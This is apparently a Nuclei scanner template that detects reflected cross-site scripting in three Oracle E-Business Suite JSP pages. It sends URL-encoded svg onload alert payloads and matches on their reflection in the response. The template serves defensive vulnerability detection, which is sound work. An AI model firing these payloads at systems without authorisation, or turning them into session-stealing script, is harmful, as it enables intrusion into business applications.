id: oracle-ebs-xss

info:
  name: Oracle E-Business Suite - Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  reference:
    - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
    - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
  metadata:
    max-request: 3
  tags: oracle,xss,ebs,intrusive

http:
  - method: GET
    path:
      - "{{BaseURL}}/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E"
      - "{{BaseURL}}/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E"
      - "{{BaseURL}}/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<svg/onload=alert('{{randstr}}')>"
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "text/html"
        part: header

# digest: 4b0a00483046022100a7ebe870668ccf4aad20bb3e381eafeed4ca7e862fb5aa937bd373773b5cf8370221009bdc5c6872d99c8c7fce50b2224e777805f6a2ba82f400209987acdc903ed507:922c64590222798bb761d5b6d8e72950